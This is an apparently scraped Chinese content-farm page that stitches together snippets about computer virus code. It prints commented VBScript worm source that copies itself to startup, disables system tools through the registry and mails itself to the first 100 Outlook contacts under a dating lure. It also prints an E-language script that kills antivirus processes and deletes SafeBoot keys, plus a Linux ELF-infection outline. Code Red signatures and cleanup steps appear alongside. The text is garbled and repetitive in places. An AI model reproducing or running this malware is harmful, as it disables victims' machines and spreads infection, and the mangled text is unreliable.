为您找到与病毒代码百科相关的共200个结果:
计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。这是目前官方最权威的关于计算机病毒的定义,此定义也被通行的《计算机病毒防治产品评级准则》的国家标准所采纳。以下是读文网网小编为大家整理的关于vbs电脑病毒代码的相关知识,希望对大家有所帮助!
上海计算机病毒防范服务中心提醒,本周需防范一种在网上流行的“VBS病毒”(Virus.VBS.d),该病毒不但导致多种杀毒软件不能运行,而且还会弹出“解毒号码”等欺诈信息,要求被害用户向指定账户汇款,反病毒专家提醒用户不要被这种欺诈信息迷惑。
据介绍,这种病毒可以导致多种杀毒软件或工具不能正常运行。更值得注意的是,当病毒感染的文件数超过2000个,会弹出对话框提示信息,提示内容为:“您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465***!”反病毒专家分析,这个号码是QQ号,受害用户一旦加入这个号码,会被要求向指定账户汇款。专家提醒这通常是欺诈行为,受害用户要以正常方式杀毒,不要轻信这种欺诈信息。
专家建议,平时用户上网时要开启防病毒软件的实时监控功能,并关闭U盘的“自动播放功能”。用户可针对自己计算机安装的操作系统,找到相应的安全漏洞补丁,下载并安装。以遏制利用这些漏洞进行传播的病毒,减少病毒给计算机用户带来的危害。
on error resume next
set fs=createobject("ing.filesystemobject" '创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作
set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置
set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置
set so=createobject("ing.filesystemobject"
dim r '定义一个变量
set r=createobject("w.shell"
so.getfile(w.fullname).copy(dir1&"win32system.vbs" '复制病毒副本到windows/winnt文件夹位置
so.getfile(w.fullname).copy(dir2&"win32system.vbs" '复制病毒副本到system32/system文件夹位置
so.getfile(w.fullname).copy(dir1&"start menuprograms启动win32system.vbs" '复制病毒副本到start menu启动菜单
'下面是对注册表的恶意修改和简单的依靠oe传播
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerorun",1,"reg_dword" '修改注册表,禁止“运行”菜单
r.regwrite "kcusoftwaremicrosoftwindowscurrentversionpoliciesexploreroclose",1,"reg_dword" '修改注册表,禁止“关闭”菜单
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerodrives",63000000,"reg_dword" '修改注册表,隐藏所有逻辑盘符
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciessystemdisableregistrytools",1,"reg_dword" '修改注册表,禁止注册表编辑
r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionunscanregistry","" '修改注册表,禁止开机注册表扫描
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerologoff",1,"reg_dword" '修改注册表,禁止“注销”菜单
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpolicieswinoldapporealmode",1,"reg_dword" '修改注册表,禁止ms-dos实模式
r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionunwin32system","win32system.vbs" '修改注册表,使这个脚本本身开机自动运行
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerodesktop",1,"reg_dword" '修改注册表,禁止显示桌面图标
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpolicieswinoldappdisabled",1,"reg_dword" '修改注册表,禁止纯dos模式
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerosettaskbar",1,"reg_dword" '修改注册表,禁止“任务栏和开始”菜单
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexploreroviewcontextmenu",1,"reg_dword" '修改注册表,禁止右键菜单
浏览量:3
下载量:0
时间:
今天读文网小编要跟大家介绍下电脑病毒的源代码,下面就是读文网小编为大家整理到的资料,请大家认真看看!
建立磁盘底层驱动。
1.校验IDT的NPXSegment Overrun(09)和Page Fault(OE)的矢量地址,如果存在,则把高16位设置为0,这个过程和还原软件的原理是一样的,就是对OE的HOOK检验。
2.给自己找个位置,查找驱动资源中的1000/1000,然后COPY到ALLOVER缓冲区中。
3.建立物理磁盘PhysicalHardDISK0的Device----DosDevices的底层借口,针对“IRP_MJ_CREATE”“IRP_MJ_CLOSE”“IRP_MJ_DEVICE_CONTROL”响应。“IRP_MJ_CREATE”断开DeviceHarddisk0DR0-1上的附属部件。从而使磁盘OS层提供的应用层文件系统鉴听校验失效。
然后通过“I_M_C ”中恢复DR0-1上的附加。并在I_M_D_C中对0x0004f8E——0xF0003C0F作出响应,把ALLOVER缓冲区中找到的数据解密并返回应用层。通过KEY-s查表产生密钥。0x0004f8E——0xF0003C0F字段会将用户态代码作为源基,对其运算后得到字串KEY,用来对源驱动解密后,反还给用户层。
在这个过程中,有个大家比较熟悉的截面,就是系统由于磁盘底层驱动校验不成功而出现的蓝屏截面,最常见的是初始值0x0004f8E,比如,早期的SATAⅠ在保护卡状态下出现物理坏道(0%—1%),就是这个蓝屏代码。很多由于用户态的软件安装不当,引起的蓝屏也出现在这一区段中。在解除DR0-1上的附属部件时,出现逻辑性错误就导致大家常见的中机器狗后的蓝屏。多见于多处理器平台。一般的PC是不会出现这个错误的,也就是说,大多数中招后都能正常使用,就是木马多多,呵呵。
继续正题,以上过程反映到IE上是这样的:1.释放底层驱动程序(比如变种前的PCIHDD.SYS)或者高位数用户态临时驱动(变种后,可以有可执行程序引导,如“Usrinit.exe”)
2.定位WINDOWS系统中的userinit.exe。(通过MBR和第一引导扇区参数来定位文件磁盘矢量偏移。)
3.并校验RF文件与地位后读取的数据位置的正确性。
4.将获取的代码参数返回给底层驱动,控制0x0004f8E——0xF0003C0F段为,最后将返回值(TQ)直接写入userinit.exe数据所在的第一蔟。这里要大家特别注意以下,通过用户态的shell调用,作者只需一点变动,就可以随即抓取用户态引导文件,所以,目前的改名设权限都是没用的。
甚至,他可以把这个过程省略,象净网先锋那样,把Shell进程写入动态连接库。那么,还原就没用了。还会带来网络负载问题,可能是作者比较仁慈吧。
好了,分析了以上的过程,解决的办法就出来了,就是要通过对操作系统的内核编译,将他所定位的目的地址占据,这样,除非是格式化,否则,任何操作的不会在底层夺取该位置。(不要问权限问题,在底层是没有这个说法的,先入为主。)
这篇是讲得比较专业点儿的,基本上把机器狗如何在底层获取控制权限过程都讲解了。
夹并启动运行,以及如何调用系统级动态。
浏览量:2
下载量:0
时间:
编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码被称为计算机病毒(Computer Virus)。具有破坏性,复制性和传染性。
编写电脑病毒代码是建立在对系统与网络充分的理解基础之上的,从有病毒以来每一种经典病毒无一不是智力的杰作这就是说就是你对系统网络有充分了解没有过人的思维智慧依旧编写不了病毒。如果你说就像写一个简单的那么一个del删除指令在没经过用户允许就删除了文件就算病毒了。
编写电脑病毒代码是什么
电脑病毒是编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码被称为计算机病毒(Computer Virus)。具有破坏性,复制性和传染性。
电脑病毒有哪些
1、系统病毒
系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。如CIH病毒。
2、蠕虫病毒
蠕虫病毒的前缀是:Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。
电脑病毒的危害
电脑病毒的直接影响是会对电脑资源产生破坏和损失,带来相应的经济损失,但最令人担心的是将会对社会产生严重的恐慌,引发社会动荡。回想上世纪八十年代,蠕虫病毒造成了美国的计算机网络堵塞,其影响的范围和效果让全世界为之震惊。同时也让电脑病毒开始受到重视,成为计算机研究的一个领域。
其次如果你想学习制作电脑病毒 你就需要学习计算机语言中的汇编语言和C语言,因为一个简单的电脑病毒编写绝大多数代码都可以用这两种语言来完成。在编写电脑病毒时,我们还需要对电脑的结构和运行过程等方面有一定了解,这样才能让电脑病毒制作更加成功。如果你对这些基础都不牢固也有办法,现在网络上有一些简单的病毒制造机,也就是一类病毒编写软件。
电脑病毒的危害
其实不同的病毒造成的危害不同,例如有利用系统漏洞进入电脑的病毒,这种病毒对于电脑的破坏性是有致命的,可能会直接导致你电脑崩溃,将你电脑里面的所有数据清空,你想想如果你电脑里面有公司资料,或者一些自己珍贵的文件,一旦中了这种病毒也许你就要被老板炒鱿鱼了
浏览量:3
下载量:0
时间:
红色代码病毒,该病毒利用IIS的缓冲区溢出漏洞,通过TCP的80端口传播,并且该病毒变种在感染系统后会释放出黑客程序,下面由读文网小编给你做出详细的介绍!希望对你有帮助!谢谢,欢迎回访!
1、在WINNTSYSTEM32LOGFILESW3SVC1目录下的日志文件中是否含有以下内容
GET,/default.ida,
quduwenquduwenquduwenquduwenquduwenquduwenquduwenX
quduwenquduwenquduwenquduwenquduwenquduwenquduwenquduwenXXXXX
quduwenquduwenquduwenquduwenquduwenquduwenquduwenquduwenXXXXX
quduwenquduwenquduwenquduwenquduwenquduwenquduwenXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
如果发现这些内容,那么该系统已经遭受“红色代码II”的攻击。
2、使用命令netstat –a
如果在1025以上端口出现很多SYN-SENT连接请求,或者1025号以上的大量端口处于Listening状态,那么该系统已经遭受“红色代码II”病毒的感染。
3、如果在以下目录中存在Root.exe文件,说明系统已被感染。
C:inetpubScriptsRoot.exe
D:inetpubScriptsRoot.exe
C:progra~1Common~1SystemMSADCRoot.exe
D:Progra~1Common~1SystemMSADCRoot.exe
同时,“红色代码II”还会释放出以下两个文件C:Explorer.exe or D:Explorer.exe。这两个文件都是木马程序。
4、由于遭受“红色代码II”病毒的攻击,NT服务器中的Web服务和Ftp服务会异常中止。
4解决方案编辑
1、请到以下微软站点下载补丁程序:
http://www.microsoft.com/technet/security/bulletin/MS01-033.asp
2、断掉网络重新启动系统,防止病毒通过网络再次感染。
3、安装微软补丁程序。
4、删除以下病毒释放的木马程序
C:inetpubScriptsRoot.exe
D:inetpubScriptsRoot.exe
C:progra~1Common~1SystemMSADCRoot.exe
D:Progra~1Common~1SystemMSADCRoot.exe
使用以下命令删除以下文件:
ATTRIB C:EXPLORER.EXE -H -A -R
DEL C:EXPLORER.EXE
ATTRIB D:EXPLORER.EXE -H -A -R
DEL D:EXPLORER.EXE
5、将以下键值改为0
HKLMSOFTWAREMicrosoftWindowsNTCurrent VersionWinL
看了此文电脑病毒红色代码介绍
浏览量:3
下载量:0
时间:
红色代码病毒利用IIS的缓冲区溢出漏洞,通过TCP的80端口传播,并且该病毒变种在感染系统后会释放出黑客程序。下面由读文网小编给你做出详细的红色代码病毒特性介绍!希望对你有帮助!欢迎回访读文网网站,谢谢!
1、在WINNTSYSTEM32LOGFILESW3SVC1目录下的日志文件中是否含有以下内容
GET,/default.ida,
quduwenquduwenquduwenquduwenquduwenquduwenquduwenX
quduwenquduwenquduwenquduwenquduwenquduwenquduwenquduwenXXXXX
quduwenquduwenquduwenquduwenquduwenquduwenquduwenquduwenXXXXX
quduwenquduwenquduwenquduwenquduwenquduwenquduwenXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
如果发现这些内容,那么该系统已经遭受“红色代码II”的攻击。
2、使用命令netstat –a
如果在1025以上端口出现很多SYN-SENT连接请求,或者1025号以上的大量端口处于Listening状态,那么该系统已经遭受“红色代码II”病毒的感染。
3、如果在以下目录中存在Root.exe文件,说明系统已被感染。
C:inetpubScriptsRoot.exe
D:inetpubScriptsRoot.exe
C:progra~1Common~1SystemMSADCRoot.exe
D:Progra~1Common~1SystemMSADCRoot.exe
同时,“红色代码II”还会释放出以下两个文件C:Explorer.exe or D:Explorer.exe。这两个文件都是木马程序。
4、由于遭受“红色代码II”病毒的攻击,NT服务器中的Web服务和Ftp服务会异常中止。
看过“红色代码病毒特性 ”人还看了:
4.病毒命名规则有哪些
浏览量:3
下载量:0
时间:
电脑病毒名称,该病毒利用IIS的缓冲区溢出漏洞,通过TCP的80端口传播,并且该病毒变种在感染系统后会释放出黑客程序。下面由读文网小编给你做出详细的;红色代码病毒特性介绍!希望对你有帮助!欢迎回访读文网网站,谢谢!
一种新的计算机病毒“红色代码二型”正开始扩散,曾经感染“红色代码”病毒的计算机,极有可能再被这新的病毒入侵。
“红色代码二型”不仅会损毁网页及将病毒扩散,而且会开启后门,令任何人都可以进入网站,大肆破坏或删改内容。 美国计算机安全公司表示,已经下载防病毒软件补丁的计算机,不会受“红色代码二型”感染。计...
1、请到以下微软站点下载补丁程序:
http://www.microsoft.com/technet/security/bulletin/MS01-033.asp
2、断掉网络重新启动系统,防止病毒通过网络再次感染。
3、安装微软补丁程序。
4、删除以下病毒释放的木马程序
C:inetpubScriptsRoot.exe
D:inetpubScriptsRoot.exe
C:progra~1Common~1SystemMSADCRoot.exe
D:Progra~1Common~1SystemMSADCRoot.exe
使用以下命令删除以下文件:
ATTRIB C:EXPLORER.EXE -H -A -R
DEL C:EXPLORER.EXE
ATTRIB D:EXPLORER.EXE -H -A -R
DEL D:EXPLORER.EXE
5、将以下键值改为0
HKLMSOFTWAREMicrosoftWindowsNTCurrent VersionWinL
看过“红色代码病毒特性介绍 ”人还看了:
浏览量:3
下载量:0
时间:
电脑中了病毒想从它的源代码入手怎么办呢!有读文网小编在,下面由读文网小编给你做出详细的电脑病毒源代码介绍!希望对你有帮助!
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerosetfolders",1,"reg_dword" '修改注册表,禁止控制面板
r.regwrite "hklmsoftwareclasses.reg","txtfile" '修改注册表,禁止导入使用.reg文件,改为用txt文件的关联
r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionwinlogonlegalnoticecaption","警告" '设置开机提示框标题
r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionwinlogonlegalnoticetext","您中vbs脚本病毒了,哭吧~" '设置开机提示框文本内容
set ol=createobject("outlook.application" '创建outlook文件对象用于传播
on error resume next
for x=1 to 100
set mail=ol.createitem(0)
mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) '用于向地址簿的前100名发送此 vbs病毒,可以算是简单弱智的蠕虫了吧~~
mail.subject="今晚你来吗?" '邮件主题
mail.body="朋友你好:您的朋友rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网" '邮件内容
mail.attachments.add(dir2&"win32system.vbs"
mail.send
next
ol.quit
'下面是对internet explore 选项的恶意修改
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsobrowsercontextmenu",1,"reg_dword" '修改注册表,禁止鼠标右键
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsobrowseroptions",1,"reg_dword" '修改注册表,禁止internet选项
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsobrowsersaveas",1,"reg_dword" '修改注册表,禁止“另存为”
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsofileopen",1,"reg_dword" '修改注册表,禁止“文件/打开”菜单
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol paneladvanced",1,"reg_dword" '修改注册表,禁止更改高级页设置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelcache internet",1,"reg_dword" '修改注册表,禁止更改临时文件设置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelautoconfig",1,"reg_dword" '修改注册表,禁止更改自动配置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelhomepage",1,"reg_dword" '修改注册表,禁止更改主页,即“主页”变灰
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelhistory",1,"reg_dword" '修改注册表,禁止更改历史记录设置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelconnwiz admin lock",1,"reg_dword" '修改注册表,禁止更改internet连接向导
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelsecuritytab",1,"reg_dword" '修改注册表,禁止更改安全项
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelesetwebsettings",1,"reg_dword" '修改注册表,禁止“重置web设置”
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsoviewsource",1,"reg_dword" '修改注册表,禁止查看源文件
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerinfodeliveryestrictionsoaddingsubions",1,"reg_dword" '修改注册表,禁止添加脱机计划
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerofilemenu",1,"reg_dword" '修改注册表,禁止“文件”菜单
看了“电脑病毒源代码介绍”文章的还看了:
浏览量:2
下载量:0
时间:
在网络中,计算机病毒能不断复制并造成严重的破坏,然而它们会如何为繁衍而寻找配偶呢?在新出版的《进化》杂志上,计算机病毒可通过计算机程序配对繁衍。下面由读文网小编给你做出详细的修改代码可减少电脑病毒进化介绍!希望对你有帮助!
完美的计算机系统是不存在的,它的漏洞衍生出了神秘的计算机病毒。想想吧,只是一段信息,却在它的生存空间(也就是网络环境)中存活、自我复制、繁衍甚至进化,直如生命一般。只是它本身少了个承载体,要借着别人的实体发威。
而今美国学者拿出了生物择偶方式来类比病毒的配对,使得这些代码更沾了点生老病死的味道,就差能喜怒哀乐了。不过这真说不好,就像我们的大自然,你怎知它不是一台巨型计算机呢?
看了“修改代码可减少电脑病毒进化介绍”文章的还看了:
浏览量:4
下载量:0
时间:
写这篇文章的目的主要是对最近写的一个Linux病毒原型代码做一个总结,同时向对这方面有兴趣的朋友做一个简单的介绍。下面由读文网小编给你做出详细的Linux病毒原型代码介绍!希望对你有帮助!
1 ELF文件执行流程重定向和代码插入
在ELF文件感染的问题上,ELF Infector与病毒传播时调用的infect_virus思路是一样的:
* 定位到文本段,将病毒的代码接到文本段的尾部。这个过程的关键是要熟悉ELF文件的格式,将病毒代码复制到文本段尾部后,能够根据需要调整文本段长度改变所影响到的后续段(segment)或节(section)的虚拟地址。同时注意把新引入的文本段部分与一个.setion建立关联,防止strip这样的工具将插入的代码去除。还有一点就是要注意文本段增加长度的对齐问题,见ELF文档中的描述:
p_align
As ``Program Loading'' later in this part describes, loadable
process segments must have congruent values for p_vaddr and
p_offset, modulo the page size.
* 通过过将ELF文件头中的入口地址修改为病毒代码地址来完成代码重定向:
/* Modify the entry point of the ELF */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
2 病毒代码如何返回到真正的ELF文件入口
方法技巧应该很多,这里采用的方法是PUSH+RET组合:
__asm__ volatile (
…
"return:"
"push $0xAABBCCDD" /* push ret_addr */
"ret"
::);
其中0xAABBCCDD处存放的是真正的程序入口地址,这个值在插入病毒代码时由感染程序来填写。
看了“Linux病毒原型代码”文章的还看了:
浏览量:3
下载量:0
时间:
你知道最简单的电脑病毒代码是什么吗!简单的代码不容易被杀毒软件发现!下面由读文网小编给你做出详细的最简单的电脑病毒代码介绍!希望对你有帮助!
运行 (“taskkill /f /im kavsvc.exe”, 假, 1)
运行 (“taskkill /f /im KVXP.kxp”, 假, 1)
运行 (“taskkill /f /im Rav.exe”, 假, 1)
运行 (“taskkill /f /im Ravmon.exe”, 假, 1)
运行 (“taskkill /f /im Mcshield.exe”, 假, 1)
运行 (“taskkill /f /im VsTskMgr.exe”, 假, 1)
修改系统时间:
置现行时间 (到时间 (“8888年8月8日”))
禁用任务管理器:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr”, 0)
禁用注册表:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableregistrytools”, 1)
隐藏开始中的运行 禁止WIN2000/XP通过任务管理器创建新任务:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun”, 1)
隐藏“MS-DOS方式”下的磁盘驱动器。不管是在“我的电脑”里,或“MS-DOS”方式下都看不见了:
写注册项 (3, “SoftWare Microsoft Windows CurrentVersion PoliciesWinOldAppDisabled”, 1)
隐藏开始中的关机:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose”, 1)
隐藏开始中的搜索:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, 1)
OVER360防御:
写注册项 (4, “SOFTWARE360SafesafemonExecAccess”, 0)
写注册项 (4, “SOFTWARE360SafesafemonMonAccess”, 0)
写注册项 (4, “SOFTWARE360SafesafemonSiteAccess”, 0)
写注册项 (4, “SOFTWARE360SafesafemonUDiskAccess”, 0)
结束360进程
运行 (“taskkill /f /im 360tray.exe”, 假, 1)
隐藏所有驱动器:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives”, 4294967295)
禁止所有驱动器:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive”, 4294967295)
隐藏文件夹选项:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions”, 1)
将桌面对象隐藏:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop”, 1)
隐藏开始中的关机:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose”, 1)
隐藏开始中的搜索:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, 1)
这条有两种情况。1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0启用两项
写注册项 (3, “SoftwarePoliciesMicrosoftWindowsSystemDisableCMD”, 1)
隐藏主页选项组:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage”, 1)
隐藏IE文件菜单:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu”, 1)
隐藏收藏夹菜单:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFavorites”, 1)
禁用IE打印功能:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoPrinting”, 1)
隐藏Internet选项:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions”, 1)
禁止IE查看源文件:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource”, 1)
禁用IE下载功能:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionInterner Settingsones31803”, 3)
禁止右键关联菜单:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu”, 1)
修改文件关联:
写注册项 (1, “.txt”, “jpegfile”)
写注册项 (1, “.inf”, “jpegfile”)
写注册项 (1, “.reg”, “jpegfile”)
写注册项 (1, “.exe”, “jpegfile”)
无法进入安全模式:
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{36FC9E60-C465-11CF-8056-444553540000}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E965-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E969-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E96A-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E96B-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E96F-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E972-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E973-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E974-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E975-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E977-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E97B-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E97D-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E980-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{71A27CDD-812A-11D0-BEC7-08002BE2092F}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkAFD”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkAppMgmt”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBase”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBoot Bus Extender”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBoot file system”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBrowser”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkCryptSvc”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkDcomLaunch”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkDhcp”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmadmin”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmboot.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmio.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmload.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmserver”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkDnsCache”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkEventLog”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkFile system”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkFilter”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkHelpSvc”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkip6fw.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkipnat.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkLanmanServer”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkLanmanWorkstation”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkLmHosts”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkMessenger”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNDIS”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNDIS Wrapper”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNdisuio”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetBIOS”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetBIOSGroup”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetBT”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetDDEGroup”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetlogon”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetMan”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetwork”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetworkProvider”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNtLmSsp”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPCI Configuration”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPlugPlay”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPNP Filter”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPNP_TDI”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPrimary disk”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpcdd.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpdd.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpwd.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdsessmgr”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkRpcSs”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSCSI Class”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworksermouse.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSharedAccess”)
